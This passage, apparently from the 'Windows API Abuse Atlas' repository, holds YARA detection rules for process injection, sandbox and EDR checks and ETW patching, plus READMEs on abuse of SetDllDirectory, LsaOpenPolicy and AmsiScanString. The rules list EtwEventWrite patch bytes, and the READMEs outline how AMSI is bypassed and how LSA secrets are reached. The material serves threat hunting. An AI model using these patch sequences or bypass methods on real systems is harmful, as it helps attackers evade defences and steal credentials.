Atlas - EnumProcessModules" 46 | strings: 47 | // Module enumeration 48 | $enum = "EnumProcessModules" ascii 49 | $enumEx = "EnumProcessModulesEx" ascii 50 | 51 | // Suspicious DLLs / sandbox indicators 52 | $dll1 = "sbiedll.dll" ascii 53 | $dll2 = "api_log.dll" ascii 54 | $dll3 = "dir_watch.dll" ascii 55 | $dll4 = "vmcheck.dll" ascii 56 | $dll5 = "pstorec.dll" ascii 57 | $dll6 = "snxhk.dll" ascii 58 | $dll7 = "SbieDll.dll" ascii 59 | $dll8 = "dbghelp.dll" ascii 60 | $dll9 = "avghookx.dll" ascii 61 | $dll10 = "avghooka.dll" ascii 62 | $dll11 = "vmtoolsd.exe" ascii 63 | $dll12 = "vboxhook.dll" ascii 64 | 65 | condition: 66 | uint16(0) == 0x5A4D and // PE file 67 | filesize < 10MB and 68 | (1 of ($enum, $enumEx)) and (2 of ($dll*)) 69 | } 70 | 71 | rule EnumProcessModules_SecurityProductCheck 72 | { 73 | meta: 74 | description = "Detects use of EnumProcessModules for EDR or AV detection" 75 | reference = "Windows API Abuse Atlas - EnumProcessModules" 76 | 77 | strings: 78 | // API use 79 | $api1 = "EnumProcessModules" ascii 80 | $api2 = "EnumProcessModulesEx" ascii 81 | 82 | // Known EDR/AV DLLs 83 | $sec1 = "amsi.dll" ascii 84 | $sec2 = "avcuf32.dll" ascii 85 | $sec3 = "avcuf64.dll" ascii 86 | $sec4 = "bdcore.dll" ascii 87 | $sec5 = "kasperskylab" ascii 88 | $sec6 = "crowdstrike" ascii 89 | $sec7 = "cyoptics.dll" ascii 90 | $sec8 = "cyvrss.dll" ascii 91 | $sec9 = "edrsensor.dll" ascii 92 | $sec10 = "eawt.dll" ascii 93 | $sec11 = "trapsagent" ascii 94 | $sec12 = "cb.exe" ascii 95 | $sec13 = "carbonblack" ascii 96 | $sec14 = "SentinelAgent.dll" ascii 97 | $sec15 = "mfetdi2k.sys" ascii 98 | 99 | condition: 100 | uint16(0) == 0x5A4D and // PE file 101 | filesize < 10MB and 102 | (1 of ($api*)) and (3 of ($sec*)) 103 | } 104 | -------------------------------------------------------------------------------- /OLE32/CoCreateInstanceEx/sample.c: -------------------------------------------------------------------------------- 1 | #include // Added to fix the 'printf' implicit declaration warning/error 2 | #include 3 | #include // For CoInitializeEx and CoUninitialize 4 | #include // For IWebBrowser2 and related GUIDs 5 | #include // For OLE functions 6 | 7 | // A simple helper macro for checking HRESULT values 8 | #define CHECK_HR(hr, msg) \ 9 | if (FAILED(hr)) { \ 10 | printf(msg " failed with HRESULT: 0x%08lX\n", hr); \ 11 | goto cleanup; \ 12 | } 13 | 14 | int main() { 15 | HRESULT hr; 16 | IWebBrowser2* pWebBrowser = NULL; 17 | 18 | // The CLSID for the WebBrowser control. This is a standard GUID. 19 | const CLSID CLSID_WebBrowser = {0x8856F961, 0x340A, 0x11D0, {0xA9, 0x6B, 0x00, 0xC0, 0x4F, 0xD7, 0x05, 0xA2}}; 20 | 21 | // The IID for the IWebBrowser2 interface. 22 | const IID IID_IWebBrowser2 = {0xD30C1661, 0xC810, 0x11D2, {0x9F, 0x47, 0x00, 0xC0, 0x4F, 0x79, 0x6E, 0x3A}}; 23 | 24 | // 1. Initialize the COM library. This must be done before any COM calls. 25 | // We use COINIT_APARTMENTTHREADED for UI-related objects. 26 | hr = CoInitializeEx(NULL, COINIT_APARTMENTTHREADED); 27 | CHECK_HR(hr, "CoInitializeEx"); 28 | 29 | // 2. Set up the COSERVERINFO structure. 30 | // For this local example, we set pwszName to NULL. 31 | // For a remote machine, you would specify the machine's name here (e.g., L"\\server"). 32 | COSERVERINFO serverInfo = {0}; 33 | serverInfo.pwszName = NULL; // Instantiate on the local machine 34 | serverInfo.dwReserved1 = 0; 35 | serverInfo.dwReserved2 = 0; 36 | 37 | // 3. Set up the MULTI_QI array. 38 | // This structure specifies the interfaces we want to retrieve. 39 | // We only need one for this example: IWebBrowser2. 40 | MULTI_QI qi[1]; 41 | qi[0].pIID = &IID_IWebBrowser2; 42 | qi[0].pItf = NULL; // Will be filled by CoCreateInstanceEx 43 | qi[0].hr = S_OK; 44 | 45 | // 4. Call CoCreateInstanceEx to create the object. 46 | // We pass the CLSID, server info, and our MULTI_QI array. 47 | printf("Attempting to create WebBrowser object locally...\n"); 48 | hr = CoCreateInstanceEx( 49 | &CLSID_WebBrowser, // Corrected: Pass a pointer to the CLSID, not the CLSID itself 50 | NULL, // Outer object for aggregation (not used here) 51 | CLSCTX_LOCAL_SERVER, // Context in which to run the code 52 | &serverInfo, // Server information (local in this case) 53 | 1, // Number of interfaces to request 54 | qi // The array of interfaces to request 55 | ); 56 | 57 | // Check the overall return code for CoCreateInstanceEx 58 | CHECK_HR(hr, "CoCreateInstanceEx"); 59 | 60 | // Check the HRESULT for the specific interface request 61 | hr = qi[0].hr; 62 | CHECK_HR(hr, "Failed to retrieve IWebBrowser2 interface"); 63 | 64 | // The call was successful. Get the interface pointer. 65 | pWebBrowser = (IWebBrowser2*)qi[0].pItf; 66 | printf("Successfully created IWebBrowser2 object.\n"); 67 | 68 | // 5. Use the object. For this example, we'll navigate to a URL. 69 | printf("Navigating to http://www.google.com...\n"); 70 | hr = pWebBrowser->lpVtbl->Navigate( 71 | pWebBrowser, 72 | (BSTR)L"http://www.google.com", 73 | NULL, NULL, NULL, NULL 74 | ); 75 | CHECK_HR(hr, "Navigate"); 76 | printf("Navigation command sent. The browser is now active.\n"); 77 | 78 | // The web browser is now running, but we can't see it without a host window. 79 | // This example is for demonstrating the instantiation, not for a full-fledged 80 | // UI application. 81 | 82 | cleanup: 83 | // 6. Clean up resources. 84 | if (pWebBrowser != NULL) { 85 | printf("Releasing IWebBrowser2 interface.\n"); 86 | // Release the reference to the COM object. 87 | pWebBrowser->lpVtbl->Release(pWebBrowser); 88 | } 89 | 90 | // Uninitialize the COM library. This must be the last COM call. 91 | CoUninitialize(); 92 | 93 | printf("Program finished.\n"); 94 | return 0; 95 | } 96 | -------------------------------------------------------------------------------- /NTDLL/NtProtectVirtualMemory/NtProtectVirtualMemory.yar: -------------------------------------------------------------------------------- 1 | // Note: Use these YARA rules at your own risk. They are loosely scoped and intended primarily 2 | // for threat hunting and research purposes — not for deployment in detection systems that 3 | // require a low false positive rate. Please review and test in your environment before use. 4 | 5 | 6 | rule NtProtectVirtualMemory_ProcessInjection 7 | { 8 | meta: 9 | description = "Detects use of NtProtectVirtualMemory for process injection" 10 | author = "Windows API Abuse Atlas" 11 | strings: 12 | $a = "NtProtectVirtualMemory" ascii 13 | $b = "VirtualAllocEx" ascii 14 | $c = "WriteProcessMemory" ascii 15 | $d = "CreateRemoteThread" ascii 16 | condition: 17 | uint16(0) == 0x5A4D and filesize < 10MB and 18 | all of them 19 | //2 of ($a, $b, $c, $d) 20 | } 21 | 22 | rule NtProtectVirtualMemory_ServiceInjection 23 | { 24 | meta: 25 | description = "Detects use of NtProtectVirtualMemory for service injection" 26 | author = "Windows API Abuse Atlas" 27 | strings: 28 | $a = "NtProtectVirtualMemory" ascii 29 | $b = "OpenSCManager" ascii 30 | $c = "OpenService" ascii 31 | $d = "QueryServiceStatusEx" ascii 32 | condition: 33 | uint16(0) == 0x5A4D and filesize < 10MB and 34 | all of them 35 | //$a and 1 of ($b, $c, $d) 36 | } 37 | 38 | rule NtProtectVirtualMemory_Unhooking 39 | { 40 | meta: 41 | description = "Detects use of NtProtectVirtualMemory for user-mode unhooking" 42 | author = "Windows API Abuse Atlas" 43 | strings: 44 | $a = "NtProtectVirtualMemory" ascii 45 | $b = "GetModuleHandle" ascii 46 | $c = "ntdll.dll" ascii 47 | $d = "memcpy" ascii 48 | condition: 49 | uint16(0) == 0x5A4D and filesize < 10MB and 50 | all of them 51 | //$a and 1 of ($b, $c, $d) 52 | } 53 | 54 | rule NtProtectVirtualMemory_AntiDebugging 55 | { 56 | meta: 57 | description = "Detects use of NtProtectVirtualMemory for anti-debugging" 58 | author = "Windows API Abuse Atlas" 59 | strings: 60 | $a = "NtProtectVirtualMemory" ascii 61 | $b = "NtQueryInformationProcess" ascii 62 | $c = "CheckRemoteDebuggerPresent" ascii 63 | $d = "DbgBreakPoint" ascii 64 | condition: 65 | uint16(0) == 0x5A4D and filesize < 10MB and 66 | all of them 67 | //$a and 1 of ($b, $c, $d) 68 | } 69 | 70 | rule NtProtectVirtualMemory_EnclaveAbuse 71 | { 72 | meta: 73 | description = "Detects NtProtectVirtualMemory usage in VBS/IUM enclave manipulation" 74 | author = "Windows API Abuse Atlas" 75 | strings: 76 | $a = "NtProtectVirtualMemory" ascii 77 | $b = "NtCreateUserProcess" ascii 78 | $c = "IsolatedUserMode" ascii nocase 79 | $d = "VirtualizationBasedSecurity" ascii nocase 80 | condition: 81 | uint16(0) == 0x5A4D and filesize < 10MB and 82 | all of them 83 | //$a and 1 of ($b, $c, $d) 84 | } 85 | 86 | rule ProcessInjection_Explorer_Shellcode 87 | { 88 | meta: 89 | description = "Detects process injection targeting explorer.exe with shellcode and key APIs" 90 | author = "Windows API Abuse Atlas" 91 | 92 | strings: 93 | // Key APIs used in process injection 94 | $api1 = "NtProtectVirtualMemory" ascii fullword 95 | $api2 = "NtWriteVirtualMemory" ascii fullword 96 | $api3 = "NtAllocateVirtualMemory" ascii fullword 97 | $api4 = "NtCreateThreadEx" ascii fullword 98 | $api5 = "OpenProcess" ascii fullword 99 | 100 | // Common target process for injection 101 | $target1 = "explorer.exe" ascii nocase fullword 102 | $target2 = "scvhost.exe" ascii nocase fullword 103 | 104 | // Typical shellcode stub pattern (common x64 prologue bytes) 105 | $shellcode = { FC 48 83 E4 F0 E8 } 106 | 107 | condition: 108 | uint16(0) == 0x5A4D and filesize < 10MB and 109 | all of ($api*) and 110 | any of ($target*) and 111 | $shellcode 112 | } 113 | -------------------------------------------------------------------------------- /KERNEL32/WriteProcessMemory/WriteProcessMemory.yar: -------------------------------------------------------------------------------- 1 | import "pe" 2 | 3 | rule DLL_Injection_LoadLibrary_WriteProcessMemory 4 | { 5 | meta: 6 | description = "Detect classic DLL injection behavior using WriteProcessMemory + LoadLibrary" 7 | author = "Windows API Abuse Atlas" 8 | strings: 9 | $wpm = "WriteProcessMemory" 10 | $load = "LoadLibrary" // LoadLibraryA or LoadLibraryW 11 | condition: 12 | filesize < 10MB and 13 | pe.is_pe and 14 | 1 of ($wpm, $load) and 15 | pe.imports("kernel32.dll", "WriteProcessMemory") and 16 | pe.imports("kernel32.dll", "LoadLibraryA") or pe.imports("kernel32.dll", "LoadLibraryW") 17 | } 18 | 19 | rule Reflective_DLL_Injection 20 | { 21 | meta: 22 | description = "Detect reflective DLL injection stub or loader" 23 | strings: 24 | $m1 = "NTDLL.DLL" 25 | $m2 = "RtlMoveMemory" 26 | $m3 = "VirtualAlloc" 27 | $m4 = { 4C 8B DC 48 83 EC ?? 48 8D 05 ?? ?? ?? ?? } // common prologue for reflective stubs 28 | condition: 29 | filesize < 10MB and 30 | pe.is_pe and 31 | pe.imports("kernel32.dll", "WriteProcessMemory") and 32 | all of them 33 | } 34 | 35 | rule Shellcode_Injection_WPM 36 | { 37 | meta: 38 | description = "Detect shellcode injection setup using WriteProcessMemory + RWX memory" 39 | strings: 40 | $virtualalloc = "VirtualAllocEx" 41 | $wpm = "WriteProcessMemory" 42 | $createthread = "CreateRemoteThread" 43 | $createthread_nt = "NtCreateThreadEx" 44 | condition: 45 | filesize < 10MB and 46 | pe.is_pe and 47 | all of ($virtualalloc, $wpm) and 48 | any of ($createthread, $createthread_nt) 49 | } 50 | 51 | rule Process_Hollowing_WPM 52 | { 53 | meta: 54 | description = "Detect process hollowing behavior (CreateSuspended + WPM)" 55 | strings: 56 | $create = "CreateProcess" // CreateProcessA or CreateProcessW 57 | $wpm = "WriteProcessMemory" 58 | $resume = "ResumeThread" 59 | condition: 60 | filesize < 10MB and 61 | pe.is_pe and 62 | all of them and 63 | pe.imports("kernel32.dll", "WriteProcessMemory") and 64 | pe.imports("kernel32.dll", "ResumeThread") 65 | } 66 | 67 | rule Thread_Hijacking 68 | { 69 | meta: 70 | description = "Detect thread hijacking using WPM + SetThreadContext" 71 | strings: 72 | $wpm = "WriteProcessMemory" 73 | $setctx = "SetThreadContext" 74 | $getctx = "GetThreadContext" 75 | condition: 76 | filesize < 10MB and 77 | pe.is_pe and 78 | all of them 79 | } 80 | 81 | rule IAT_EAT_Patching 82 | { 83 | meta: 84 | description = "Detect binaries manipulating import/export tables" 85 | strings: 86 | $iat = "ImportAddressTable" 87 | $eat = "ExportAddressTable" 88 | $wpm = "WriteProcessMemory" 89 | $patch = "patch" wide ascii 90 | condition: 91 | filesize < 10MB and 92 | pe.is_pe and 93 | $wpm and 1 of ($iat, $eat) and $patch 94 | } 95 | 96 | rule Config_Injection_WPM 97 | { 98 | meta: 99 | description = "Detect config blob writing using WPM" 100 | strings: 101 | $wpm = "WriteProcessMemory" 102 | $cfg = "config" wide ascii 103 | $aes = "AES" ascii 104 | condition: 105 | filesize < 10MB and 106 | pe.is_pe and 107 | all of them 108 | } 109 | 110 | rule Interprocess_Staging 111 | { 112 | meta: 113 | description = "Detect staging via memory writing and named pipes" 114 | strings: 115 | $wpm = "WriteProcessMemory" 116 | $pipe = "\\\\.\\pipe\\" ascii 117 | condition: 118 | filesize < 10MB and 119 | pe.is_pe and 120 | all of them 121 | } 122 | 123 | rule Memory_Stomping_WPM 124 | { 125 | meta: 126 | description = "Detect code injection into trusted processes using WPM" 127 | strings: 128 | $wpm = "WriteProcessMemory" 129 | $explorer = "explorer.exe" 130 | $svchost = "svchost.exe" 131 | condition: 132 | filesize < 10MB and 133 | pe.is_pe and 134 | $wpm and 1 of ($explorer, $svchost) 135 | } 136 | -------------------------------------------------------------------------------- /KERNEL32/SetDllDirectory/README.md: -------------------------------------------------------------------------------- 1 | # 🛠️ SetDllDirectory 2 | 3 | ## 🚀 Executive Summary 4 | `SetDllDirectory` lets a program modify the search path Windows uses to locate DLLs. This is super handy for developers who want to load libraries from custom locations, but it also opens the door to DLL hijacking, sideloading, and persistence tricks. Attackers love APIs like this because it lets them redirect where Windows looks for code, swapping out trusted libraries for their own malicious versions. 5 | 6 | ## 🔍 What is SetDllDirectory? 7 | Normally, when an application loads a DLL, Windows checks a standard list of familiar directories ... things like the application’s folder, System32, and the PATH environment variable. The `SetDllDirectory` function changes that order by inserting or removing directories. This means the application will look somewhere else first (or ignore some places entirely). 8 | 9 | For developers, it solves dependency headaches. For attackers, it’s a stealthy way to influence how and where code gets loaded. 10 | 11 | ## 🚩 Why It Matters 12 | Because DLL loading happens all the time in Windows, messing with search paths can have wide reaching effects. If an attacker can control what directory a process trusts first, they can sneak in a malicious DLL that gets executed instead of the real one. 13 | 14 | It’s one of those APIs that isn’t flashy on its own, but when combined with filesystem tricks, persistence, or privilege escalation, it becomes a powerful piece of the puzzle. 15 | 16 | ## 🧬 How Attackers Abuse It 17 | Attackers don’t call `SetDllDirectory` for fun. They’ll: 18 | 19 | - Redirect an application to load a malicious DLL from a folder they control. 20 | - Drop a fake DLL in a directory that is now “trusted” because of a modified search path. 21 | - Use it as part of a sideloading chain where a legitimate binary imports a DLL, but attackers decide where Windows looks first. 22 | 23 | In short, it’s about bending the rules of DLL resolution in their favor. 24 | 25 | ## 🛡️ Detection Opportunities 26 | Monitoring API usage is one way to catch suspicious `SetDllDirectory` calls, but context matters. Some apps genuinely use this for compatibility. What stands out is when it’s called by processes that don’t usually load from custom directories, or when the new path points to odd places like temp folders, user profile directories, or removable drives. 27 | 28 | Here are some sample YARA rules to detect suspicious use of `SetDllDirectory`: 29 | 30 | See [SetDllDirectory.yar](./SetDllDirectory.yar). 31 | 32 | > **Note:** Use these YARA rules at your own risk. They are loosely scoped and intended primarily for threat hunting and research purposes; **NOT** for deployment in detection systems that require a low false positive rate. Please review and test in your environment before use. 33 | 34 | ### 🐾 Behavioral Indicators 35 | - A process calling SetDllDirectory followed by LoadLibrary from non-standard paths. 36 | - DLL loads from writable directories (Downloads, Temp, Desktop). 37 | - Persistence mechanisms where registry run keys or scheduled tasks launch binaries that tweak DLL search paths. 38 | 39 | ## 🦠 Malware & Threat Actors Documented Abusing SetDllDirectory 40 | 41 | ### **Ransomware** 42 | - CatB 43 | - LockBit 44 | - StopCrypt 45 | 46 | ### **Commodity Loaders & RATs** 47 | - FormBook 48 | - NetWire RAT 49 | - TrickBot 50 | 51 | ### **APT & Threat Actor Toolkits** 52 | - APT41 53 | - Louse 54 | - ToddyCat 55 | 56 | ### **Red Team & Open Source Tools** 57 | - Cobalt Strike 58 | - Probably others? Let me know. 59 | 60 | > **Note:** This list isn’t exhaustive. It is possible more modern malware families and offensive security tools use `SetDllDirectory`. 61 | 62 | ## 🧵 `SetDllDirectory` and Friends 63 | SetDllDirectory doesn’t act alone. It often pairs with: 64 | 65 | - `LoadLibrary` or `LoadLibraryEx`: To actually pull in the targeted DLLs. 66 | - `AddDllDirectory` & `RemoveDllDirectory`: More modern, granular APIs for managing DLL search paths. 67 | - `SetSearchPathMode`: Lets apps control how Windows searches for DLLs more broadly. 68 | 69 | ## 📚 Resources 70 | - [Microsoft Docs: SetDllDirectory](https://learn.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-setdlldirectorya) 71 | - [Windows API Abuse Atlas](https://github.com/danafaye/WindowsAPIAbuseAtlas) 72 | 73 | > Open a PR or issue to help keep this list up to date! -------------------------------------------------------------------------------- /NTDLL/EtwEventWrite/EtwEventWrite.yar: -------------------------------------------------------------------------------- 1 | // Note: Use these YARA rules at your own risk. They are loosely scoped and intended primarily 2 | // for threat hunting and research purposes — not for deployment in detection systems that 3 | // require a low false positive rate. Please review and test in your environment before use. 4 | 5 | import "pe" 6 | 7 | rule EtwEventWrite_Patch_x64 8 | { 9 | meta: 10 | description = "Detects x64 patching of EtwEventWrite (xor rax, rax; ret and variants)" 11 | reference = "windows-api-abuse-atlas" 12 | strings: 13 | $xor_ret = { 48 33 C0 C3 } 14 | $ret_0x14 = { C2 14 00 } 15 | $nop_ret = { 90 90 90 C3 } 16 | $mov_eax0_ret = { B8 00 00 00 00 C3 } 17 | condition: 18 | uint16(0) == 0x5A4D and 19 | (3 of ($xor_ret, $ret_0x14, $nop_ret, $mov_eax0_ret)) 20 | } 21 | 22 | rule EtwEventWrite_Patch_x86 23 | { 24 | meta: 25 | description = "Detects x86 patching of EtwEventWrite (xor eax, eax; ret and variants)" 26 | reference = "windows-api-abuse-atlas" 27 | strings: 28 | $xor_ret = { 33 C0 C3 } 29 | $ret_0x10 = { C2 10 00 } 30 | $mov_eax0_ret = { B8 00 00 00 00 C3 } 31 | condition: 32 | uint16(0) == 0x5A4D and 33 | (3 of ($xor_ret, $ret_0x10, $mov_eax0_ret)) 34 | } 35 | 36 | rule EtwEventWrite_Patch_Strings 37 | { 38 | meta: 39 | description = "Detects references to EtwEventWrite and related APIs (including stack strings, wide, hex, base64)" 40 | reference = "windows-api-abuse-atlas" 41 | strings: 42 | $etw_ascii = "EtwEventWrite" ascii nocase 43 | $etw_wide = "EtwEventWrite" wide nocase 44 | // Stack string (split) 45 | $etw_stack = "Etw" ascii nocase 46 | $etw_stack2 = "EventWrite" ascii nocase 47 | // Hex encoded 48 | $etw_hex = { 45 74 77 45 76 65 6E 74 57 72 69 74 65 } 49 | // Base64 encoded (EtwEventWrite) 50 | $etw_b64 = { 52 58 4E 76 5A 58 4A 70 5A 57 35 30 } 51 | // Related APIs 52 | $getproc = "GetProcAddress" ascii nocase 53 | $virtualprotect = "VirtualProtect" ascii nocase 54 | $writeproc = "WriteProcessMemory" ascii nocase 55 | $ntdll_str = "ntdll.dll" ascii nocase 56 | // PowerShell/CLR 57 | $ps_ref = "Add-Type" ascii nocase 58 | $clr_ref = "System.Reflection" ascii nocase 59 | // Python 60 | $py_ref = "ctypes" ascii nocase 61 | // Go 62 | $go_ref = "syscall.NewCallback" ascii nocase 63 | condition: 64 | uint16(0) == 0x5A4D and 65 | (2 of ($etw_ascii, $etw_wide, $etw_stack, $etw_stack2, $etw_hex, $etw_b64)) and 66 | (1 of ($getproc, $virtualprotect, $writeproc, $ntdll_str, $ps_ref, $clr_ref, $py_ref, $go_ref)) 67 | } 68 | 69 | rule EtwEventWrite_Patch_Base64 70 | { 71 | meta: 72 | description = "Detects base64-encoded EtwEventWrite patch shellcode" 73 | reference = "windows-api-abuse-atlas" 74 | strings: 75 | $b64_patch1 = "SDPAww==" // 48 33 C0 C3 (xor rax, rax; ret) 76 | $b64_patch2 = "whQA" // C2 14 00 (ret 0x14) 77 | $b64_patch3 = "kJCQww==" // 90 90 90 C3 (nop; nop; nop; ret) 78 | condition: 79 | uint16(0) == 0x5A4D and 80 | any of them 81 | } 82 | 83 | rule LockBit_Etw_Patch_OnDisk 84 | { 85 | meta: 86 | description = "Detects on-disk LockBit v4 loader that patches EtwEventWrite" 87 | reference = "windows-api-abuse-atlas" 88 | strings: 89 | $xor_ret = { 48 33 C0 C3 } 90 | $ret_0x14 = { C2 14 00 } 91 | $nop_ret = { 90 90 90 C3 } 92 | $etw_str = "EtwEventWrite" ascii nocase 93 | $getproc = "GetProcAddress" ascii nocase 94 | $virtualprotect = "VirtualProtect" ascii nocase 95 | $writeproc = "WriteProcessMemory" ascii nocase 96 | $ntdll_str = "ntdll.dll" ascii nocase 97 | $lb_conf = "LockBit" ascii wide nocase 98 | $lb_tag = "LB_CONFIG" ascii nocase 99 | condition: 100 | uint16(0) == 0x5A4D and 101 | filesize < 10MB and 102 | 1 of ($xor_ret, $ret_0x14, $nop_ret) and 103 | 2 of ($etw_str, $getproc, $virtualprotect, $writeproc, $ntdll_str) and 104 | 1 of ($lb_conf, $lb_tag) 105 | } 106 | 107 | -------------------------------------------------------------------------------- /ADVAPI32/LsaOpenPolicy/README.md: -------------------------------------------------------------------------------- 1 | # 🛠️ LsaOpenPolicy 2 | 3 | ## 🚀 Executive Summary 4 | `LsaOpenPolicy` is a door opener. Literally. It’s the API call that gets you into the Local Security Authority (LSA) policy object, which then lets you query or modify local security settings. Normally it’s used by administrators or services that need to check domain trust info, audit policies, or account rights. But attackers? They love it because once you’ve got a handle from `LsaOpenPolicy`, you can start digging into sensitive secrets like service account credentials, policy information, or even manipulate privileges. Think of it as the master key to a whole section of Windows security internals. 5 | 6 | ## 🔍 What is LsaOpenPolicy? 7 | At its core, `LsaOpenPolicy` is a function in Advapi32.dll that lets software open a handle to the local or a remote machine’s LSA Policy object. The handle it returns is what unlocks a bunch of other powerful LSA functions. Admin tools use it all the time for things like reading audit policy or managing trust relationships. Attackers? They use it for credential dumping and persistence. 8 | 9 | The function takes in a target system name, a desired access level, and spits out a handle. If that access mask asks for full rights, you’ve just handed someone the keys to a very sensitive part of the system. 10 | 11 | ## 🚩 Why It Matters 12 | Once you can open the policy object, you’re not just playing in the shallow end anymore. You can start grabbing secrets stored in LSA, enumerate trust paths for lateral movement, and even change what accounts are allowed to do on the system. It’s rarely the final step. It’s the enabler. Think of it as the pivot point between having basic access and taking control of security-critical information. 13 | 14 | ## 🧬 How Attackers Abuse It 15 | Attackers typically don’t call `LsaOpenPolicy` just to feel accomplished. They call it because it’s the required first step to use other juicy functions like `LsaRetrievePrivateData` or `LsaAddAccountRights`. For example, credential dumping tools like Mimikatz use this call to get their initial policy handle before they start pulling secrets out of memory. Others abuse it to enumerate trust relationships across domains, which helps map the environment for further compromise. 16 | 17 | On its own, `LsaOpenPolicy` doesn’t steal anything. It just unlocks the ability to do so. That’s why defenders need to pay attention to what follows it. 18 | 19 | ## 🛡️ Detection Opportunities 20 | Here are some sample YARA rules to detect suspicious use of `LsaOpenPolicy`: 21 | 22 | See [LsaOpenPolicy.yar](./LsaOpenPolicy.yar). 23 | 24 | > **Note:** Use these YARA rules at your own risk. They are loosely scoped and intended primarily for threat hunting and research purposes; **NOT** for deployment in detection systems that require a low false positive rate. Please review and test in your environment before use. 25 | 26 | ### 🐾 Behavioral Indicators 27 | - Non-standard processes (not lsass.exe or known management tools) calling `LsaOpenPolicy` 28 | - `LsaOpenPolicy` followed by LsaRetrievePrivateData or other sensitive LSA calls 29 | - Access requests asking for `POLICY_ALL_ACCESS` instead of minimal rights 30 | - Use of this API in tools running from unusual paths (temp folders, user profiles) 31 | - Correlation with privilege escalation or credential dumping behavior 32 | 33 | ## 🦠 Malware & Threat Actors Documented Abusing LsaOpenPolicy 34 | 35 | ### **Ransomware** 36 | - LockBit 37 | - Hive 38 | - Conti 39 | - AvosLocker 40 | 41 | ### **Commodity Loaders & RATs** 42 | - Emotet 43 | 44 | ### **APT & Threat Actor Toolkits** 45 | 46 | ### **Red Team & Open Source Tools** 47 | - MimiKatz 48 | 49 | 50 | > **Note:** This list isn’t exhaustive. It is possible more modern malware families and offensive security tools use `LsaOpenPolicy`. 51 | 52 | ## 🧵 `LsaOpenPolicy` and Friends 53 | `LsaOpenPolicy` is rarely the star of the show. It’s the opening act. Once that handle is open, it’s often followed by: 54 | 55 | - `LsaRetrievePrivateData` to extract stored secrets. 56 | - `LsaStorePrivateData` to implant persistence. 57 | - `LsaEnumerateTrustedDomains` to map trust paths. 58 | - `LsaAddAccountRights` or `LsaRemoveAccountRights` to quietly alter privileges. 59 | 60 | Together, these calls turn a simple “open policy” operation into a major compromise pathway. 61 | 62 | ## 📚 Resources 63 | - [Microsoft Docs: LsaOpenPolicy](https://learn.microsoft.com/en-us/windows/win32/api/ntsecapi/nf-ntsecapi-lsaopenpolicy) 64 | - [Windows API Abuse Atlas](https://github.com/danafaye/WindowsAPIAbuseAtlas) 65 | 66 | > Open a PR or issue to help keep this list up to date! -------------------------------------------------------------------------------- /AMSI/AmsiScanString/README.md: -------------------------------------------------------------------------------- 1 | # 🛠️ AmsiScanString 2 | 3 | ## 🚀 Executive Summary 4 | `AmsiScanString` is one of the crown jewels of Microsoft’s Antimalware Scan Interface (AMSI). It gives security tools a peek inside potentially dangerous strings. Think PowerShell commands, JavaScript snippets, or script content loaded at runtime. While defenders rely on it to flag malicious code before execution, attackers see it as a roadblock that needs to be bypassed, patched, or neutered. Understanding how AmsiScanString works, and how adversaries wriggle around it is essential for both building detections and recognizing evasion tricks in the wild. 5 | 6 | ## 🔍 What is AmsiScanString? 7 | `AmsiScanString` is a Windows API provided by AMSI that lets applications and services send strings of content (like scripts or commands) to an antimalware engine for inspection. It’s often invoked by script hosts like PowerShell or Windows Script Host whenever new code is being executed. In plain English: it’s the API that helps antivirus products catch malicious scripts in memory, before they run wild. 8 | 9 | ## 🚩 Why It Matters 10 | The string level inspection that `AmsiScanString` enables is a huge defensive win. Without it, obfuscated PowerShell or memory script payloads would sail under the radar. But because it’s such a critical chokepoint, attackers spend significant energy figuring out how to disable it. If you see someone tampering with or bypassing AmsiScanString, it’s almost always an indicator of malicious intent. 11 | 12 | ## 🧬 How Attackers Abuse It 13 | Attackers don’t typically call `AmsiScanString directly (unless they’re testing detections). Instead, their abuse comes in the form of trying to get around it. Classic tricks include: 14 | 15 | - Patching the function in memory so it always returns “clean.” 16 | - Overwriting the function pointer in amsi.dll, effectively breaking the scanning pipeline. 17 | - Unloading or disabling AMSI altogether, forcing Windows components to execute without scanning. 18 | - Encoding or chunking payloads so malicious strings slip through before AMSI has a chance to inspect them. 19 | 20 | The irony is that the presence of `AmsiScanString` makes it a favorite target for attackers. What was meant as a shield often becomes the first thing they try to smash. 21 | 22 | ## 🛡️ Detection Opportunities 23 | Defenders can hunt for suspicious modifications to AmsiScanString or the DLLs that house it. For example: 24 | 25 | - Monitoring memory patches to amsi.dll or inline hooks inside processes like PowerShell. 26 | - Flagging when AmsiScanString suddenly starts returning unexpected values (like constant “clean” results). 27 | - Looking for processes that load amsi.dll but immediately disable its exports. 28 | 29 | Here are some sample YARA rules to detect suspicious use of `AmsiScanString`: 30 | 31 | See [AmsiScanString.yar](./AmsiScanString.yar). 32 | 33 | > **Note:** Use these YARA rules at your own risk. They are loosely scoped and intended primarily for threat hunting and research purposes; **NOT** for deployment in detection systems that require a low false positive rate. Please review and test in your environment before use. 34 | 35 | ### 🐾 Behavioral Indicators 36 | - PowerShell or WSH processes loading amsi.dll and then exhibiting API patching behavior. 37 | - Scripts that load shellcode or encoded payloads after AMSI tampering. 38 | - Inline patch signatures (like mov eax, 0; ret) inside AmsiScanString. 39 | 40 | ## 🦠 Malware & Threat Actors Documented Abusing AmsiScanString 41 | 42 | ### **Ransomware** 43 | - LockBit 44 | - Play 45 | 46 | ### **Commodity Loaders & RATs** 47 | - Agent Telsa 48 | - BlotchyQuasar 49 | - Remcos RAT 50 | 51 | ### **APT & Threat Actor Toolkits** 52 | - APT28 53 | - APT41 54 | - Lazarus 55 | 56 | ### **Red Team & Open Source Tools** 57 | - Cobalt Strike 58 | - Metasploit 59 | 60 | > **Note:** This list isn’t exhaustive. It is possible more modern malware families and offensive security tools use `AmsiScanString`. 61 | 62 | ## 🧵 `AmsiScanString` and Friends 63 | `AmsiScanString` is usually seen alongside its sibling APIs like [AmsiScanBuffer](https://github.com/danafaye/WindowsAPIAbuseAtlas/tree/main/AMSI/AmsiScanBuffer), which scan chunks of data instead of just strings. Attackers who go after one often try to neuter the whole AMSI pipeline, so defenders should widen their focus beyond a single function. 64 | 65 | ## 📚 Resources 66 | - [Microsoft Docs: AmsiScanString](https://learn.microsoft.com/en-us/windows/win32/api/amsi/nf-amsi-amsiscanstring) 67 | - [Windows API Abuse Atlas](https://github.com/danafaye/WindowsAPIAbuseAtlas) 68 | 69 | > Open a PR or issue to help keep this list up to date! --------------------------------------------------------------------------------